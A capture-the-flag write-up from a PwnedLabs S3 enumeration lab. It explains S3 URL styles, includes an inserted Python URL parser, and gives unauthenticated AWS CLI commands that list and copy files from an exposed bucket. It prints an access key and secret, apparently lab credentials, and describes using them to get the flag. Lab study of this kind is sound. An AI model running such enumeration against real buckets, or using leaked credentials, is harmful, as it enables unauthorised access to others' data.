S3 - Enum Basics - PwnedLabs
For example, we have a website that fetches resources from an S3 bucket. Viewing the page source, we spot the following:

In AWS we have the following types of buckets:
1. Amazon S3 Buckets (Object Storage)
   - General-Purpose Buckets – For storing any kind of object (files, images, logs, backups, etc.).
   - Static Website Hosting Buckets – Configured to serve a website directly from S3.
   - Logging Buckets – Used for storing access logs from CloudTrail, ALB, or S3 itself.
   - Data Lake Buckets – Used for storing large-scale data for analytics (e.g., AWS Lake Formation).
   - Backup Buckets – Used to store backups from AWS Backup or other services.
   - Machine Learning Data Buckets – For training ML models with AWS SageMaker.
From the AWS documentation here, we observe the following:
Every object in a bucket has a URL that can be used to access it. As Amazon states: "Every object is contained in a bucket. For example, if the object named photos/puppy.jpg is stored in the amzn-s3-demo-bucket bucket in the US West (Oregon) Region, then it is addressable by using the URL https://amzn-s3-demo-bucket.s3.us-west-2.amazonaws.com/photos/puppy.jpg"
In our source code above, we have "https://s3.amazonaws.com/dev.huge-logistics.com/static/style.css", which means the name of the bucket is dev.huge-logistics.com, although the URL is not in the format stated above. GPT explains this:
1️⃣ Virtual-Hosted Style URL (Modern Default)
Most AWS documentation now suggests using the virtual-hosted style URL format, where the bucket name appears as a subdomain:
https://<bucket-name>.s3.<region>.amazonaws.com/<object-path>
For example, if the bucket is amzn-s3-demo-bucket in us-west-2, an object called photos/puppy.jpg would be accessed at:
https://amzn-s3-demo-bucket.s3.us-west-2.amazonaws.com/photos/puppy.jpg
This is now the default method for accessing objects in newer AWS regions.
2️⃣ Path-Style URL (Older Format, Used in Some Cases)
The URL you provided follows the older path-style access method:
https://s3.amazonaws.com/<bucket-name>/<object-path>
Your example:
https://s3.amazonaws.com/dev.huge-logistics.com/static/style.css
Here:
s3.amazonaws.com is the base S3 endpoint.
dev.huge-logistics.com is the bucket name.
/static/style.css is the object path.
AWS allowed this format for a long time, but in 2019, AWS announced that path-style URLs are being deprecated for new buckets in most regions. However, older buckets or buckets in legacy regions (like us-east-1) still support it.
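To audit which buckets a site's page source exposes, the two URL layouts above can be told apart mechanically. The following Python is an added example, not part of the original writeup: the function names and the sample HTML are constructed for illustration, and it assumes standard aws-partition endpoints only.

```python
import re
from urllib.parse import urlparse, unquote

# Assumption: standard "aws" partition endpoints only (no dualstack, FIPS,
# China, or website endpoints). Region may be joined with "." or "-".
_S3_HOST = re.compile(
    r"(?:(?P<bucket>.+)\.)?s3(?:[.-](?P<region>[a-z]{2}(?:-[a-z]+)+-\d))?\.amazonaws\.com"
)
_URL = re.compile(r"https?://[^\s\"'<>]+")


def parse_s3_url(url):
    """Split an S3 object URL into style, bucket, region and key (or None)."""
    parts = urlparse(url)
    m = _S3_HOST.fullmatch((parts.hostname or "").lower())
    if not m:
        return None
    path = unquote(parts.path).lstrip("/")
    if m.group("bucket"):                      # bucket is a subdomain
        style, bucket, key = "virtual-hosted", m.group("bucket"), path
    else:                                      # bucket is the first path segment
        style = "path"
        bucket, _, key = path.partition("/")
        if not bucket:
            return None
    return {
        "style": style, "bucket": bucket, "region": m.group("region"), "key": key,
        # A dotted name does not match the single-label wildcard certificate
        # on *.s3.amazonaws.com, so HTTPS only works in path style.
        "https_vhost_ok": "." not in bucket,
    }


def buckets_in_html(html):
    """Return the sorted bucket names referenced by S3 URLs in page source."""
    found = {p["bucket"] for u in _URL.findall(html) if (p := parse_s3_url(u))}
    return sorted(found)


# Constructed sample input (the first URL is the one quoted from the page source).
SAMPLE_HTML = """
<link rel="stylesheet" href="https://s3.amazonaws.com/dev.huge-logistics.com/static/style.css">
<img src="https://amzn-s3-demo-bucket.s3.us-west-2.amazonaws.com/photos/puppy.jpg">
<a href="https://example.com/about">About</a>
"""

if __name__ == "__main__":
    print(buckets_in_html(SAMPLE_HTML))
```

The `https_vhost_ok` field shows why a dotted bucket name such as dev.huge-logistics.com tends to appear in path-style URLs.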
Okay so we can enumerate it.
Any command help in AWS is generally in the format:
aws <module> <additional API call (if any)> help
So, aws s3 help tells you that you can run "ls" to enumerate:
aws s3 ls s3://dev.huge-logistics.com/admin --no-sign-request

The following command would do a recursive "ls." If it can't access anything it would throw an error.
aws s3 ls s3://dev.huge-logistics.com/admin --no-sign-request --recursive

Similarly, one can look in a specific folder by appending the folder name to the URL:
aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
aws s3 ls s3://dev.huge-logistics.com/static/ --no-sign-request

However, we don't have access to admin and migration-files right now. We can copy the hl_migration_project.zip to current folder like so:
aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request

We see access keys in one of the files. This is a bad practice.

We can configure these credentials using the "aws configure" command and access other folders.


But I couldn't access these. So I accessed another folder.

It had this line:
<CredentialEntry>
<ServiceType>AWS IT Admin</ServiceType>
<AccountID>794929857501</AccountID>
<AccessKeyID>AKIA3SFMDAPOQRFWFGCD</AccessKeyID>
<SecretAccessKey>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</SecretAccessKey>
<Notes>AWS credentials for production workloads. Do not share these keys outside of the organization.</Notes>
</CredentialEntry>

^ I configured the compromised access keys and accessed the flag that way.
